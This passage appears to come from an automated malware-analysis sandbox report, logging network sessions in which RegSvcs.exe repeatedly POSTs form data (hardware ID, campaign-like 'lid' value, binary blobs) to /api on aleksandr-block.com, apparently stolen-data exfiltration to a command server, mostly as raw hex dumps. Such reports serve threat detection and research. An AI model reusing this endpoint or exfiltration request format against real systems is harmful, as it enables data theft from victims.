                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=2011&min_rtt=1996&rtt_var=759&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2846&recv_bytes=952&delivery_rate=1462925&cwnd=252&unsent_bytes=0&cid=a2ffc8c887aebf27&ts=355&x=0"
                                                                    2025-01-14 07:27:15 UTC238INData Raw: 34 39 39 34 0d 0a 48 4e 42 79 77 53 4f 4c 6c 49 39 74 31 55 43 44 42 2f 6c 51 64 69 77 70 78 64 6f 71 58 64 74 51 56 6c 61 30 4b 46 4b 75 58 32 39 6e 38 67 54 6a 47 62 2b 34 72 52 36 77 59 72 6c 7a 69 79 55 54 41 41 75 6b 76 67 68 6e 76 54 45 36 4a 64 45 45 63 4e 67 79 54 53 61 32 45 36 31 51 37 72 69 74 43 4b 31 69 75 56 79 43 63 68 4e 43 43 2f 2f 34 54 7a 65 35 4d 54 6f 30 31 55 4d 39 33 6a 4d 4d 64 4c 77 56 71 55 62 6f 38 4f 34 42 75 43 58 6d 59 70 67 36 47 45 56 45 72 62 63 49 63 66 6b 31 4c 48 53 4f 43 68 2f 4c 4b 77 35 52 73 51 47 71 41 66 61 34 39 45 2b 77 4c 71 45 39 32 7a 45 54 54 6b 57 6a 76 6b 45 31 73 7a 67 79 4e 64 42 43 49 73 63 35 42 33 53 79 46 71 68 4d 34 65 54 6a 43 37 38 75 34 47 69 59
                                                                    Data Ascii: 4994HNBywSOLlI9t1UCDB/lQdiwpxdoqXdtQVla0KFKuX29n8gTjGb+4rR6wYrlziyUTAAukvghnvTE6JdEEcNgyTSa2E61Q7ritCK1iuVyCchNCC//4Tze5MTo01UM93jMMdLwVqUbo8O4BuCXmYpg6GEVErbcIcfk1LHSOCh/LKw5RsQGqAfa49E+wLqE92zETTkWjvkE1szgyNdBCIsc5B3SyFqhM4eTjC78u4GiY
                                                                    2025-01-14 07:27:15 UTC1369INData Raw: 63 6c 6f 4f 54 4c 2f 34 45 48 2f 71 41 44 63 6c 78 31 38 39 33 44 74 4e 59 66 77 4a 34 30 62 6c 74 72 56 50 76 79 37 76 59 4a 67 39 45 30 39 4c 74 62 64 49 50 4c 45 36 4d 44 37 5a 52 54 2f 43 4e 77 70 32 75 78 65 73 52 75 48 77 34 67 7a 33 62 4b 46 69 67 33 4a 4d 44 6d 75 33 75 30 73 72 74 43 4e 30 4b 35 68 54 63 4d 73 78 54 53 62 79 46 71 31 41 35 50 62 2f 42 37 77 70 35 48 65 51 4f 78 6c 44 53 36 71 79 52 7a 79 35 4e 54 34 2b 32 55 41 30 77 54 41 4c 66 72 4a 51 37 51 48 75 37 71 31 58 39 77 48 6b 64 5a 77 2b 41 67 78 78 35 36 63 47 4a 76 6b 31 4f 48 53 4f 43 6a 6a 4a 50 67 35 31 76 52 4f 72 53 76 76 32 2f 77 6d 36 4a 2f 4e 6a 6e 6a 77 65 54 56 6d 74 74 6b 34 38 73 44 6b 39 4d 64 46 4f 63 49 4a 39 43 6d 62 79 53 4f 4e 67 35 50 33 68 42 61 41 69 6f 58 72
                                                                    Data Ascii: cloOTL/4EH/qADclx1893DtNYfwJ40bltrVPvy7vYJg9E09LtbdIPLE6MD7ZRT/CNwp2uxesRuHw4gz3bKFig3JMDmu3u0srtCN0K5hTcMsxTSbyFq1A5Pb/B7wp5HeQOxlDS6qyRzy5NT4+2UA0wTALfrJQ7QHu7q1X9wHkdZw+Agxx56cGJvk1OHSOCjjJPg51vROrSvv2/wm6J/NjnjweTVmttk48sDk9MdFOcIJ9CmbySONg5P3hBaAioXr
                                                                    2025-01-14 07:27:15 UTC1369INData Raw: 6c 6d 72 73 6b 34 77 74 44 35 30 65 70 5a 4e 4b 49 78 6c 54 56 53 78 42 4b 42 4c 71 38 50 75 41 62 6b 6c 39 79 57 45 66 41 30 4f 54 4b 76 34 45 48 2b 30 4d 7a 77 79 78 45 55 39 7a 7a 4d 44 63 62 63 66 71 30 48 70 2b 2b 67 4c 76 43 6e 69 61 4a 38 67 48 6b 35 44 6f 72 6c 43 4e 66 6c 38 64 44 50 4f 43 6d 69 4d 44 42 70 31 38 43 57 67 54 2b 66 78 2b 30 2b 6f 62 50 67 6c 6e 44 35 55 46 67 75 71 73 45 30 36 74 6a 4d 2b 4f 74 4e 41 50 4d 51 7a 44 6d 79 39 46 4b 4e 4e 34 66 7a 67 41 62 4d 71 36 47 36 51 4e 42 52 50 51 65 66 32 43 44 69 68 63 6d 78 30 34 6b 30 38 77 54 4a 50 53 37 45 65 72 55 62 2f 74 76 4a 42 72 6d 4c 6d 61 64 74 71 56 45 4a 43 70 37 4e 43 4f 37 6b 31 4f 54 48 56 54 54 50 42 4f 67 64 77 74 52 53 76 53 4f 54 77 37 51 69 7a 4a 2f 4e 67 6b 6a 34 59
                                                                    Data Ascii: lmrsk4wtD50epZNKIxlTVSxBKBLq8PuAbkl9yWEfA0OTKv4EH+0MzwyxEU9zzMDcbcfq0Hp++gLvCniaJ8gHk5DorlCNfl8dDPOCmiMDBp18CWgT+fx+0+obPglnD5UFguqsE06tjM+OtNAPMQzDmy9FKNN4fzgAbMq6G6QNBRPQef2CDihcmx04k08wTJPS7EerUb/tvJBrmLmadtqVEJCp7NCO7k1OTHVTTPBOgdwtRSvSOTw7QizJ/Ngkj4Y
                                                                    2025-01-14 07:27:15 UTC1369INData Raw: 34 49 49 50 63 72 64 44 50 61 43 6d 69 4d 4e 41 52 73 76 42 36 71 54 4f 2f 2b 36 67 47 36 4b 65 64 75 6e 44 55 53 51 30 4f 71 76 55 73 2b 76 54 67 6d 4e 39 31 41 50 63 5a 39 51 7a 36 31 43 4f 4d 5a 71 64 48 68 4a 71 63 35 38 33 50 62 4c 56 70 58 43 36 43 30 43 47 66 35 4d 54 73 39 32 55 49 34 77 7a 49 4a 63 4c 51 57 72 6b 54 6d 2f 50 38 48 75 53 2f 71 61 70 41 67 46 45 4e 50 71 37 78 41 4e 4c 4e 79 65 6e 54 52 55 6e 43 55 66 54 68 7a 76 52 43 67 56 36 6e 70 6f 78 62 33 4a 65 30 6c 77 33 49 59 51 45 75 6f 74 45 51 30 73 54 4d 34 4f 74 46 50 4f 63 51 31 48 33 2b 32 47 4b 4a 50 35 76 66 70 43 72 49 6d 35 6d 47 64 50 56 51 41 43 36 43 67 43 47 66 35 48 52 4d 42 6c 47 73 4b 6a 43 4a 44 5a 2f 49 58 72 77 47 78 74 75 45 4d 75 79 72 75 59 35 49 2b 48 6b 64 41 71
                                                                    Data Ascii: 4IIPcrdDPaCmiMNARsvB6qTO/+6gG6KedunDUSQ0OqvUs+vTgmN91APcZ9Qz61COMZqdHhJqc583PbLVpXC6C0CGf5MTs92UI4wzIJcLQWrkTm/P8HuS/qapAgFENPq7xANLNyenTRUnCUfThzvRCgV6npoxb3Je0lw3IYQEuotEQ0sTM4OtFPOcQ1H3+2GKJP5vfpCrIm5mGdPVQAC6CgCGf5HRMBlGsKjCJDZ/IXrwGxtuEMuyruY5I+HkdAq
                                                                    2025-01-14 07:27:15 UTC1369INData Raw: 36 4e 6a 45 37 31 30 73 32 33 6a 6f 45 62 4c 77 64 72 45 6e 68 2f 2b 77 4c 73 69 2f 6e 61 5a 45 7a 45 30 42 46 72 2f 67 47 66 37 34 71 64 47 79 57 61 79 44 58 4c 78 74 7a 6b 78 32 73 41 66 61 34 39 45 2b 77 4c 71 45 39 32 7a 73 47 53 6b 61 31 73 55 38 78 74 6a 45 6d 4e 64 74 42 49 73 73 79 43 58 6d 2b 46 71 78 48 36 50 50 6e 41 37 41 6e 36 6d 71 58 63 6c 6f 4f 54 4c 2f 34 45 48 2b 58 4f 53 63 6a 31 55 51 37 32 69 5a 4e 59 66 77 4a 34 30 62 6c 74 72 56 50 74 43 6e 71 59 5a 73 2b 46 45 70 47 70 36 70 48 4f 4c 34 37 50 79 62 63 54 54 66 48 4e 51 5a 78 74 41 4b 76 54 2f 76 7a 2f 78 33 33 62 4b 46 69 67 33 4a 4d 44 6e 32 67 71 46 67 38 2b 77 4d 69 4e 38 42 42 50 63 42 39 45 6a 43 72 55 4b 52 4e 71 61 36 74 43 62 67 72 34 6d 71 61 4f 78 68 44 54 71 36 39 53 54
                                                                    Data Ascii: 6NjE710s23joEbLwdrEnh/+wLsi/naZEzE0BFr/gGf74qdGyWayDXLxtzkx2sAfa49E+wLqE92zsGSka1sU8xtjEmNdtBIssyCXm+FqxH6PPnA7An6mqXcloOTL/4EH+XOScj1UQ72iZNYfwJ40bltrVPtCnqYZs+FEpGp6pHOL47PybcTTfHNQZxtAKvT/vz/x33bKFig3JMDn2gqFg8+wMiN8BBPcB9EjCrUKRNqa6tCbgr4mqaOxhDTq69ST
                                                                    2025-01-14 07:27:15 UTC1369INData Raw: 42 74 56 52 63 4e 4e 7a 46 44 36 31 48 4f 4d 5a 71 66 58 71 44 4c 59 6f 36 47 6d 55 4e 52 42 63 51 61 43 71 53 54 36 79 50 7a 67 30 32 30 63 36 7a 54 51 41 63 72 38 58 70 45 37 73 74 71 4e 50 73 44 71 68 50 64 73 54 47 55 56 48 2f 4f 49 49 49 50 63 72 64 44 50 61 43 6d 69 4d 50 51 64 37 75 42 32 67 54 75 72 6b 37 41 6d 6c 49 75 78 76 69 54 67 66 53 30 61 71 74 55 73 35 76 7a 6b 34 4a 74 39 4b 4d 38 64 39 51 7a 36 31 43 4f 4d 5a 71 64 58 36 47 62 30 6c 37 58 4f 51 4d 78 64 59 52 72 66 34 42 6e 2b 6f 4e 53 56 30 6a 6c 77 67 32 7a 6f 53 4d 4b 74 51 70 45 32 70 72 71 30 4a 76 69 54 6d 59 35 55 67 45 55 68 45 71 4c 46 42 4f 37 45 78 4e 44 44 53 54 54 58 50 4d 51 5a 35 73 52 2b 6e 53 4f 66 2f 34 6b 2f 35 59 75 5a 39 32 32 70 55 62 31 43 6b 74 45 56 2f 70 6e 77
                                                                    Data Ascii: BtVRcNNzFD61HOMZqfXqDLYo6GmUNRBcQaCqST6yPzg020c6zTQAcr8XpE7stqNPsDqhPdsTGUVH/OIIIPcrdDPaCmiMPQd7uB2gTurk7AmlIuxviTgfS0aqtUs5vzk4Jt9KM8d9Qz61COMZqdX6Gb0l7XOQMxdYRrf4Bn+oNSV0jlwg2zoSMKtQpE2prq0JviTmY5UgEUhEqLFBO7ExNDDSTTXPMQZ5sR+nSOf/4k/5YuZ922pUb1CktEV/pnw
                                                                    2025-01-14 07:27:15 UTC1369INData Raw: 48 44 4c 4a 55 30 6d 38 6a 43 6f 56 2b 7a 78 2b 30 32 43 49 65 39 72 6e 43 52 55 55 58 54 70 2b 45 63 6c 2b 57 6f 4e 4c 5a 5a 4e 50 49 78 6c 54 57 75 31 45 4b 52 62 2f 2f 48 68 48 72 77 76 37 55 65 55 4e 51 4a 4e 52 4b 53 70 51 58 4f 79 50 33 52 36 6c 6b 30 6f 6a 47 56 4e 55 62 55 47 6f 47 37 71 35 2b 52 50 2b 57 4c 6d 63 39 74 71 56 48 41 4c 74 62 74 59 50 4c 59 6a 43 6e 53 4f 55 77 36 4d 4e 68 74 35 6f 68 4f 31 53 75 54 36 2f 44 48 33 65 72 55 33 79 57 42 47 48 46 54 6e 70 33 64 78 2b 54 4e 30 62 4f 39 54 63 4e 70 39 56 53 7a 38 55 4c 45 42 73 62 61 71 44 4b 55 77 35 32 61 4e 4d 56 4e 77 64 59 43 75 51 6a 69 70 4e 53 4d 37 6c 67 52 77 77 33 31 56 52 2f 49 5a 70 46 72 34 34 4f 41 66 73 47 4c 65 4b 39 73 71 56 42 59 4c 6b 72 74 47 4d 62 34 6b 4a 58 6e 78
                                                                    Data Ascii: HDLJU0m8jCoV+zx+02CIe9rnCRUUXTp+Ecl+WoNLZZNPIxlTWu1EKRb//HhHrwv7UeUNQJNRKSpQXOyP3R6lk0ojGVNUbUGoG7q5+RP+WLmc9tqVHALtbtYPLYjCnSOUw6MNht5ohO1SuT6/DH3erU3yWBGHFTnp3dx+TN0bO9TcNp9VSz8ULEBsbaqDKUw52aNMVNwdYCuQjipNSM7lgRww31VR/IZpFr44OAfsGLeK9sqVBYLkrtGMb4kJXnx
                                                                    2025-01-14 07:27:15 UTC1369INData Raw: 55 63 63 37 35 51 37 51 48 38 2f 65 45 4a 75 6a 65 75 64 49 30 78 41 6b 6b 48 72 36 6c 46 4d 2f 6b 4e 65 6e 54 4f 43 6d 69 4d 43 41 35 77 76 42 65 31 55 4b 54 57 35 67 4f 30 4c 75 42 69 32 33 78 55 53 41 76 2f 36 77 5a 2f 76 53 4e 30 62 49 59 59 61 35 6c 75 57 69 37 67 44 2b 31 59 71 65 43 74 56 2b 56 73 6f 58 66 62 61 6c 51 4a 53 4c 57 71 54 6a 79 76 4d 58 4d 4b 36 45 73 39 77 33 45 44 64 62 49 58 73 31 66 79 75 75 55 4d 72 54 6a 66 57 37 41 2b 45 6b 6c 52 6f 4c 35 75 48 2f 6c 38 64 44 75 57 45 67 6d 4d 64 55 31 42 2f 46 43 37 41 62 47 32 32 41 79 35 4c 4f 5a 7a 69 6e 38 38 62 58 47 64 2b 6d 51 34 72 48 41 41 4d 38 5a 62 4f 38 45 78 54 54 44 79 46 75 4d 5a 75 62 69 74 43 36 5a 69 75 54 58 4a 61 55 45 64 48 50 66 71 56 33 47 67 63 69 4a 30 6a 68 68 2b 6a
                                                                    Data Ascii: Ucc75Q7QH8/eEJujeudI0xAkkHr6lFM/kNenTOCmiMCA5wvBe1UKTW5gO0LuBi23xUSAv/6wZ/vSN0bIYYa5luWi7gD+1YqeCtV+VsoXfbalQJSLWqTjyvMXMK6Es9w3EDdbIXs1fyuuUMrTjfW7A+EklRoL5uH/l8dDuWEgmMdU1B/FC7AbG22Ay5LOZzin88bXGd+mQ4rHAAM8ZbO8ExTTDyFuMZubitC6ZiuTXJaUEdHPfqV3GgciJ0jhh+j
                                                                    2025-01-14 07:27:15 UTC1369INData Raw: 79 42 75 4d 5a 75 72 69 74 48 66 64 36 6f 53 4b 56 50 78 56 4e 52 61 53 71 57 6a 6d 36 4a 44 64 7a 36 48 51 56 77 54 41 49 63 4c 55 75 6e 57 44 6a 35 75 41 41 73 47 44 42 59 6f 30 78 4b 6e 42 38 74 72 39 59 66 5a 38 78 49 6a 65 57 42 48 44 55 66 56 55 2b 6b 78 71 7a 54 4f 62 78 72 79 2b 77 4e 4f 49 6c 31 58 49 51 44 68 50 6e 6e 55 55 79 76 44 77 7a 64 76 64 41 49 4d 45 79 43 6a 79 53 46 37 56 43 71 62 69 74 41 2f 64 36 6f 57 53 52 49 68 6c 42 54 4f 75 2f 55 6a 6a 35 66 48 51 36 6c 68 4a 77 7a 54 63 64 63 37 30 58 37 30 66 6e 2b 4b 30 51 2b 54 75 68 63 39 74 71 52 77 41 4c 74 66 67 51 66 2f 34 78 4a 69 62 51 53 53 62 50 65 6a 4e 41 6e 77 4b 6b 55 65 71 30 33 41 4b 7a 4e 50 52 6d 69 7a 55 71 63 47 61 31 76 31 67 38 2b 77 4d 69 4e 39 5a 45 4e 34 78 7a 54 57
                                                                    Data Ascii: yBuMZuritHfd6oSKVPxVNRaSqWjm6JDdz6HQVwTAIcLUunWDj5uAAsGDBYo0xKnB8tr9YfZ8xIjeWBHDUfVU+kxqzTObxry+wNOIl1XIQDhPnnUUyvDwzdvdAIMEyCjySF7VCqbitA/d6oWSRIhlBTOu/Ujj5fHQ6lhJwzTcdc70X70fn+K0Q+Tuhc9tqRwALtfgQf/4xJibQSSbPejNAnwKkUeq03AKzNPRmizUqcGa1v1g8+wMiN9ZEN4xzTW


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    3192.168.2.449738188.114.96.34437608C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-14 07:27:15 UTC275OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=GBSKYUYX
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                    Content-Length: 18105
                                                                    Host: aleksandr-block.com
                                                                    2025-01-14 07:27:15 UTC15331OUTData Raw: 2d 2d 47 42 53 4b 59 55 59 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 33 31 36 30 39 33 38 32 32 43 33 38 41 46 31 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41 0d 0a 2d 2d 47 42 53 4b 59 55 59 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 47 42 53 4b 59 55 59 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 61 74 78 4f 54 31 2d 2d 74 72 61 66 66 31 32 0d 0a 2d 2d 47 42 53 4b 59 55 59 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73
                                                                    Data Ascii: --GBSKYUYXContent-Disposition: form-data; name="hwid"6316093822C38AF1B960CC18D99B375A--GBSKYUYXContent-Disposition: form-data; name="pid"2--GBSKYUYXContent-Disposition: form-data; name="lid"atxOT1--traff12--GBSKYUYXContent-Dispos
                                                                    2025-01-14 07:27:15 UTC2774OUTData Raw: ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52 9c ab a6 b6 5f c9 35 8b 56 2d 7b 91 d7
                                                                    Data Ascii: f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR_5V-{
                                                                    2025-01-14 07:27:17 UTC1130INHTTP/1.1 200 OK
                                                                    Date: Tue, 14 Jan 2025 07:27:17 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Set-Cookie: PHPSESSID=pn28juu28ls80dm4e10bn5iu6d; expires=Sat, 10 May 2025 01:13:55 GMT; Max-Age=9999999; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    X-Frame-Options: DENY
                                                                    X-Content-Type-Options: nosniff
                                                                    X-XSS-Protection: 1; mode=block
                                                                    cf-cache-status: DYNAMIC
                                                                    vary: accept-encoding
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K78fTq0hjnVwCMh1LFNX4W85fsoMp3aFsSvLuZkJVtJk%2FPekRBftrcidbXcuMS%2BDayoLodC11KodR4qELmbumz%2F7757tf3yBEKkYO7k0m6d8711CEWnPDZsiYkFGNrZD6LIGKefx"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 901be70ce8dd0f7c-EWR
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1675&min_rtt=1668&rtt_var=639&sent=17&recv=24&lost=0&retrans=0&sent_bytes=2846&recv_bytes=19060&delivery_rate=1692753&cwnd=231&unsent_bytes=0&cid=9f8c3b351ac28b28&ts=1444&x=0"
                                                                    2025-01-14 07:27:17 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                    Data Ascii: fok 8.46.123.189
                                                                    2025-01-14 07:27:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    4192.168.2.449740188.114.96.34437608C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-14 07:27:17 UTC277OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=BCJZRK6OZCU
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                    Content-Length: 8744
                                                                    Host: aleksandr-block.com
                                                                    2025-01-14 07:27:17 UTC8744OUTData Raw: 2d 2d 42 43 4a 5a 52 4b 36 4f 5a 43 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 33 31 36 30 39 33 38 32 32 43 33 38 41 46 31 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41 0d 0a 2d 2d 42 43 4a 5a 52 4b 36 4f 5a 43 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 42 43 4a 5a 52 4b 36 4f 5a 43 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 61 74 78 4f 54 31 2d 2d 74 72 61 66 66 31 32 0d 0a 2d 2d 42 43 4a 5a 52 4b 36 4f 5a 43 55 0d 0a 43 6f
                                                                    Data Ascii: --BCJZRK6OZCUContent-Disposition: form-data; name="hwid"6316093822C38AF1B960CC18D99B375A--BCJZRK6OZCUContent-Disposition: form-data; name="pid"2--BCJZRK6OZCUContent-Disposition: form-data; name="lid"atxOT1--traff12--BCJZRK6OZCUCo
                                                                    2025-01-14 07:27:18 UTC1123INHTTP/1.1 200 OK
                                                                    Date: Tue, 14 Jan 2025 07:27:18 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Set-Cookie: PHPSESSID=prff5eokm7ecadfs9qi82vj488; expires=Sat, 10 May 2025 01:13:57 GMT; Max-Age=9999999; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    X-Frame-Options: DENY
                                                                    X-Content-Type-Options: nosniff
                                                                    X-XSS-Protection: 1; mode=block
                                                                    cf-cache-status: DYNAMIC
                                                                    vary: accept-encoding
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wNh4tjPh5vjA4gnAzfOQX637LSH7waKRawwmkbFnLVgLea5cylge64MLgc2CDCDiQ19GVWpavOvD00TkaEfKX%2FtqCwbYibmvDYbln9lObYWm5K0nyvTxQN6Za6m8tnvjy0scnGcS"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 901be717bd7d5e60-EWR
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=2344&min_rtt=2341&rtt_var=884&sent=6&recv=13&lost=0&retrans=0&sent_bytes=2845&recv_bytes=9679&delivery_rate=1234150&cwnd=249&unsent_bytes=0&cid=a4da93c5535cdd28&ts=827&x=0"
                                                                    2025-01-14 07:27:18 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                    Data Ascii: fok 8.46.123.189
                                                                    2025-01-14 07:27:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    5192.168.2.449741188.114.96.34437608C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-14 07:27:19 UTC278OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=QBZVGCEV2BX
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                    Content-Length: 20397
                                                                    Host: aleksandr-block.com
                                                                    2025-01-14 07:27:19 UTC15331OUTData Raw: 2d 2d 51 42 5a 56 47 43 45 56 32 42 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 33 31 36 30 39 33 38 32 32 43 33 38 41 46 31 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41 0d 0a 2d 2d 51 42 5a 56 47 43 45 56 32 42 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 51 42 5a 56 47 43 45 56 32 42 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 61 74 78 4f 54 31 2d 2d 74 72 61 66 66 31 32 0d 0a 2d 2d 51 42 5a 56 47 43 45 56 32 42 58 0d 0a 43 6f
                                                                    Data Ascii: --QBZVGCEV2BXContent-Disposition: form-data; name="hwid"6316093822C38AF1B960CC18D99B375A--QBZVGCEV2BXContent-Disposition: form-data; name="pid"3--QBZVGCEV2BXContent-Disposition: form-data; name="lid"atxOT1--traff12--QBZVGCEV2BXCo
                                                                    2025-01-14 07:27:19 UTC5066OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40
                                                                    Data Ascii: lrQMn 64F6(X&7~`aO@
                                                                    2025-01-14 07:27:19 UTC1139INHTTP/1.1 200 OK
                                                                    Date: Tue, 14 Jan 2025 07:27:19 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Set-Cookie: PHPSESSID=fkonj2n277818ve72e6vaqmapk; expires=Sat, 10 May 2025 01:13:58 GMT; Max-Age=9999999; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    X-Frame-Options: DENY
                                                                    X-Content-Type-Options: nosniff
                                                                    X-XSS-Protection: 1; mode=block
                                                                    cf-cache-status: DYNAMIC
                                                                    vary: accept-encoding
